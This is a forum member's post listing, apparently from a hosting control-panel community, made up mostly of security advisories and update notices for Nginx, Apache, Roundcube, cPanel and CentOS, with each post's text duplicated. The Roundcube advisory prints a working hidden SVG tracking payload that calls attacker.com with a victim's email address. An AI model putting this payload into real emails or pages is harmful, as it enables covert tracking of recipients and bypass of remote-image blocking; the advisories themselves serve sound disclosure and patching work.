This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
1
Other / 9 CVE's just dropped for those running Node.js
« on: June 26, 2026, 03:48:16 AM »
I know Node.js isn't part of CWP, but I've seen people posting about it.
9 new CVE's just dropped for those running Node.js that are a wide range from DoS to Bypasses.
Reference: https://sysadmin.help/viewforum.php?f=80
9 new CVE's just dropped for those running Node.js that are a wide range from DoS to Bypasses.
Reference: https://sysadmin.help/viewforum.php?f=80
2
Nginx / CVE-2026-40519 - Nginx Proxy Manager Authenticated RCE via setupCertbotPlugins()
« on: June 08, 2026, 11:26:02 PM »
CVE ID: CVE-2026-40519
Published: June 8, 2026
Description: Nginx Proxy Manager versions 2.9.14 through 2.15.1, fixed in commit a5db5ed, contain an authenticated remote code execution vulnerability via OS command injection in the setupCertbotPlugins() function in backend/setup.js, allowing attackers with certificates:manage permission to execute arbitrary commands by storing a malicious payload in the dns_provider_credentials field. The user-controlled dns_provider_credentials value is interpolated directly into a shell command executed via child_process.exec() without sanitization or escaping, causing the injected command to execute upon backend restart.
Severity: 7.7 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
https://cvefeed.io/vuln/detail/CVE-2026-40519
Published: June 8, 2026
Description: Nginx Proxy Manager versions 2.9.14 through 2.15.1, fixed in commit a5db5ed, contain an authenticated remote code execution vulnerability via OS command injection in the setupCertbotPlugins() function in backend/setup.js, allowing attackers with certificates:manage permission to execute arbitrary commands by storing a malicious payload in the dns_provider_credentials field. The user-controlled dns_provider_credentials value is interpolated directly into a shell command executed via child_process.exec() without sanitization or escaping, causing the injected command to execute upon backend restart.
Severity: 7.7 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
https://cvefeed.io/vuln/detail/CVE-2026-40519
3
Apache / 7 new CVE's for Apache. 2.4.68 Just Released
« on: June 08, 2026, 05:16:06 PM »
CISA Just release 7 new CVE's for Apache, that affect up to version 2.4.67
The Apache Foundation just release 2.4.68 that take care of the vulnerabilities.
Update guides, if needed can be found at:
HTTP/2 Version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-http-2-to-2-4-68-in-cwp-on-almalinux-8-9/
Non HTTP/2 Version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-to-2-4-68-in-cwp-on-almalinux-8-9/
The Apache Foundation just release 2.4.68 that take care of the vulnerabilities.
Update guides, if needed can be found at:
HTTP/2 Version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-http-2-to-2-4-68-in-cwp-on-almalinux-8-9/
Non HTTP/2 Version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-to-2-4-68-in-cwp-on-almalinux-8-9/
4
CSF Firewall / FYI - OWASP CRS Ruleset v4.27.0
« on: June 03, 2026, 06:38:13 PM »
Just a quick FYI, if you are using the OWASP CRS ruleset with CSF, they released 4.27.0 on Monday (2026-06-01)
Also I try and keep any OWASP CRS security notifications at:
https://sysadmin.help/viewforum.php?f=43&sid=0fe95c9ec0fc6690ab773d6d681daed5
Also I try and keep any OWASP CRS security notifications at:
https://sysadmin.help/viewforum.php?f=43&sid=0fe95c9ec0fc6690ab773d6d681daed5
5
Apache / HTTP/2 Bomb — Remote DoS Exploit Hits nginx, Apache, IIS, Envoy, and Cloudflare
« on: June 03, 2026, 02:33:34 PM »
https://cybersecuritynews.com/http-2-bomb-remote-dos-exploit/
If you are running Apache <2.4.67 or Nginx <1.29.7, Please update ASAP.
If you are running Apache <2.4.67 or Nginx <1.29.7, Please update ASAP.
6
Nginx / CVE-2026-9256 - NGINX ngx_http_rewrite_module vulnerability
« on: May 22, 2026, 07:07:23 PM »
CVE ID: CVE-2026-9256
Published: May 22, 2026
Description: NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Severity: 9.2 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
https://cvefeed.io/vuln/detail/CVE-2026-9256
Published: May 22, 2026
Description: NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module.
Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Severity: 9.2 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
https://cvefeed.io/vuln/detail/CVE-2026-9256
7
Nginx / CVE-2026-8711 - NGINX JavaScript vulnerability
« on: May 19, 2026, 06:13:48 PM »
CVE ID: CVE-2026-8711
Published: May 19, 2026, 3:16 p.m.
Description: NGINX JavaScript has a vulnerability when the js_fetch_proxy directive is configured with at least one client-controlled NGINX variable (for example, $http_*, $arg_*, $cookie_*) and a location invoking the ngx.fetch() operation from NGINX JavaScript. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR) disabled, code execution is possible. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Severity: 9.2 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
https://cvefeed.io/vuln/detail/CVE-2026-8711
I also try to keep updated CVE's pertaining to CWP at: https://sysadmin.help/viewforum.php?f=51
Published: May 19, 2026, 3:16 p.m.
Description: NGINX JavaScript has a vulnerability when the js_fetch_proxy directive is configured with at least one client-controlled NGINX variable (for example, $http_*, $arg_*, $cookie_*) and a location invoking the ngx.fetch() operation from NGINX JavaScript. An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR) disabled, code execution is possible. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Severity: 9.2 | CRITICAL
Visit the link for more details, such as CVSS details, affected products, timeline, and more...
https://cvefeed.io/vuln/detail/CVE-2026-8711
I also try to keep updated CVE's pertaining to CWP at: https://sysadmin.help/viewforum.php?f=51
8
Nginx / NGINX Rift (CVE-2026-42945): Patched nginx available in testing
« on: May 14, 2026, 08:21:30 PM »
This CVE does NOT include/involve CWP, only the direct Nginx package.
⚠️ A heap-based buffer overflow in nginx’s ngx_http_rewrite_module, disclosed as CVE-2026-42945 and nicknamed NGINX Rift, allows an unauthenticated attacker to crash a worker process, or potentially achieve remote code execution on hosts with ASLR disabled, by sending a single crafted HTTP request.
If you operate an internet-facing nginx instance, especially one with non-trivial rewrite rules in front of a PHP or application backend, this matters.
AlmaLinux's core team has built patched nginx packages, which are available in their testing repository.
After the community has helped verify them, AlmaLinux will release them to the production repositories.
⚠️ A heap-based buffer overflow in nginx’s ngx_http_rewrite_module, disclosed as CVE-2026-42945 and nicknamed NGINX Rift, allows an unauthenticated attacker to crash a worker process, or potentially achieve remote code execution on hosts with ASLR disabled, by sending a single crafted HTTP request.
If you operate an internet-facing nginx instance, especially one with non-trivial rewrite rules in front of a PHP or application backend, this matters.
AlmaLinux's core team has built patched nginx packages, which are available in their testing repository.
After the community has helped verify them, AlmaLinux will release them to the production repositories.
9
Other / To all the CWP nay sayers, cPanel has a MASSIVE CVE making it unusable
« on: May 01, 2026, 12:26:22 AM »
https://nvd.nist.gov/vuln/detail/CVE-2026-41940
And the workaround blocks ALL logins:
And the workaround blocks ALL logins:
Quote
In the meantime, using a firewall to block access to TCP ports 2083/2087 will prevent unauthorized access, but would also restrict all other access to the control panel as well.
10
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« on: February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
Field Value
CVE CVE-2026-25916
Vendor Roundcube
Product Roundcube Webmail
Affected Versions <1.5.13, <1.6.13
Disclosure Date 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.
Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.
Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.
The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.
These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.
But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.
The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.
Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.
One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.
How Attackers Exploit It
Imagine receiving this malicious HTML in an email:
Code: [Select]
text<svg width="1" height="1" style="position:absolute;left:-9999px;">
<defs>
<filter id="t">
<feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
</filter>
</defs>
<rect filter="url(#t)" width="1" height="1"/>
</svg>It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.
No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.
CVE Details
Field Value
CVE CVE-2026-25916
Vendor Roundcube
Product Roundcube Webmail
Affected Versions <1.5.13, <1.6.13
Disclosure Date 2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.
2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
11
CentOS 9 Problems / New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
« on: February 09, 2026, 03:36:30 PM »
For those running CentOS Stream 9, this is a Major Vulnerability.
New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author image Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/
A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.
The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.
The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.
Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.
Root Cause in CAKE Scheduler
The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.
The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.
Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.
New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author image Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/
A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.
The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.
The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.
Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.
Code: [Select]
cstatic s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
struct sk_buff **to_free)
{
// ...
if (q->buffer_used > q->buffer_limit) { // [1] Check buffer limit
u32 dropped = 0;
while (q->buffer_used > q->buffer_limit) {
dropped++;
cake_drop(sch, to_free); // [2] Packet is DROPPED here
}
b->drop_overlimit += dropped;
}
return NET_XMIT_SUCCESS; // [!] Returns SUCCESS anyway
} Root Cause in CAKE Scheduler
The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.
The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.
Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.
12
E-Mail / RoundCube 1.5.12 Released
« on: December 22, 2025, 01:08:21 PM »
FYI to all - RoundCube 1.5.12 was released 2025-12-13
If you need help updating, please see:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-roundcube-webmail-to-version-1-5-12-in-cwp-on-almalinux-8-9/
If you need help updating, please see:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-roundcube-webmail-to-version-1-5-12-in-cwp-on-almalinux-8-9/
13
CSF Firewall / Continued CWP support with new CSF fork
« on: December 16, 2025, 11:39:59 PM »
A developer named Aetherinox has forked CSF, and is actively supporting it, along with updates for CWP.
Please see the following KB, if you would like to update to this new fork and version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/aetherinox-csf-firewall-update-to-v15-09/
If you can, please support him also.
Please see the following KB, if you would like to update to this new fork and version:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/aetherinox-csf-firewall-update-to-v15-09/
If you can, please support him also.
14
Apache / Apache 2.4.66 released on 2025-12-04
« on: December 08, 2025, 01:15:48 PM »
For those who are using Apache, they released 2.4.66 on 2025-12-04
We've posted the new KB article and script to help admins update:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-to-2-4-66-in-cwp-on-almalinux-8-9/
We've posted the new KB article and script to help admins update:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-apache-to-2-4-66-in-cwp-on-almalinux-8-9/
15
How to / Clear alerts & notifications from CLI?
« on: December 07, 2025, 10:56:31 PM »
Anyone know how to clear the Alerts & Notifications completely out from the CLI?
There is a scripts to add alerts, but didn't see any for read and/or clear.
Thanks
There is a scripts to add alerts, but didn't see any for read and/or clear.
Thanks
